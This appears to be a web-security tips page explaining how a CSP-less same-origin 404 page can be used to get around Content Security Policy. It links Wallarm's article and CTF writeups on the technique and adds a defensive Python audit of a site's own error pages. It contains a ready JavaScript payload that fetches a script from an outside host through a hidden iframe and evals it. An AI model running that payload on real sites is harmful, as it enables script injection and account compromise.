### Wallarm 404 Page Proxy CSP Bypass Script

This article by Wallarm is legendary for bypassing CSP. There are times when you have JS execution (perhaps via `unsafe-eval`) but can't load your script from a remote server because of the `default-src` rules. Wallarm published a great technique back when CSP had just come out: use a 404 page as a proxy, because 404 pages often lack CSP headers. Here is that article: [Neatly bypassing CSP ✔️](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/ "https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/"). Here is a script you can use to easily execute JS in your target environment via the 404 page proxy:

```javascript
s='//poc.rhynorater.com/alert.js'; p='/404'; d=document;                        // s: script URL, p: same-origin page without CSP
j=d.createElement("iframe"); j.style="display:none"; j.src=p; d.body.append(j);  // hidden iframe pointing at the CSP-less page
j.contentWindow.fetch(s).then(t=>t.text()).then(eval)                           // fetch through the iframe, eval in the current page
```

Where `s` is the URL of the script you want to import and `p` is the page that is lacking CSP headers (but is same-origin).

terjanq described a very interesting variation of this technique in this writeup (which also contains a very interesting regex bypass): he loaded a page with a hugely long path so that the server errored out before setting any security headers. [google-ctf/2023/quals/web-postviewer2/solution/README.md at main · google/google-ctf · GitHub](https://github.com/google/google-ctf/blob/main/2023/quals/web-postviewer2/solution/README.md "https://github.com/google/google-ctf/blob/main/2023/quals/web-postviewer2/solution/README.md")
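
Here is an added Python check (my own example, not code from Wallarm's or terjanq's writeups) that a site owner can run against their own application to see whether the 404 and oversized-path responses carry the same CSP as the normal pages; `https://example.test` and the `fake_fetch` responses are constructed stand-ins.

```python
# Added example, not from the linked writeups: check whether a site's error
# responses (404, oversized path) carry the same CSP as its normal pages.
# fetch(url) -> (status, headers) is injected so the check runs offline too.
import urllib.error
import urllib.request

PROBES = {
    "baseline": "/",
    "not-found": "/this-path-should-not-exist-404",   # constructed path
    "long-path": "/" + "a" * 20000,   # oversized path, terjanq's variant
}

def http_fetch(url):
    """Live fetch: GET url, return (status, lower-cased headers), errors too."""
    req = urllib.request.Request(url, headers={"User-Agent": "csp-audit"})
    try:
        with urllib.request.urlopen(req, timeout=10) as r:
            return r.status, {k.lower(): v for k, v in r.headers.items()}
    except urllib.error.HTTPError as e:   # 4xx/5xx responses still carry headers
        return e.code, {k.lower(): v for k, v in e.headers.items()}

def audit_csp(base_url, fetch=http_fetch):
    """Map probe name -> (status, verdict); verdict is 'ok', 'missing'
    (no CSP header at all) or 'differs' (policy differs from baseline)."""
    status, headers = fetch(base_url + PROBES["baseline"])
    baseline = headers.get("content-security-policy")
    results = {"baseline": (status, "ok" if baseline else "missing")}
    for name, path in PROBES.items():
        if name == "baseline":
            continue
        status, headers = fetch(base_url + path)
        csp = headers.get("content-security-policy")
        if csp is None:
            verdict = "missing"      # this response can act as a CSP-less proxy
        elif csp != baseline:
            verdict = "differs"      # review the differing policy by hand
        else:
            verdict = "ok"
        results[name] = (status, verdict)
    return results

def fake_fetch(url):
    """Constructed server: CSP is only added to 200 responses, and an
    oversized path is rejected before any security header is set."""
    path = url.split("//", 1)[-1].split("/", 1)[-1]
    if len(path) > 8000:
        return 414, {"content-type": "text/html"}
    if path == "":
        return 200, {"content-security-policy": "default-src 'self'"}
    return 404, {"content-type": "text/html"}
```

On nginx, for instance, `add_header` without the `always` parameter is only applied to 2xx/3xx responses, which is one common way error pages end up without the policy.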
If you want another example: https://huntr.com/bounties/4c1c5db5-210f-4d7e-8380-b95f88fdb78d :p
I remember seeing something similar in SekaiCTF 2023, IIRC, where you would abuse the fact that the 404 pages don't have a CSP.

[SekaiCTF 2023 - Leakless Note | Kalmarunionen](https://www.kalmarunionen.dk/writeups/2023/sekai/leakless-notes/ "https://www.kalmarunionen.dk/writeups/2023/sekai/leakless-notes/")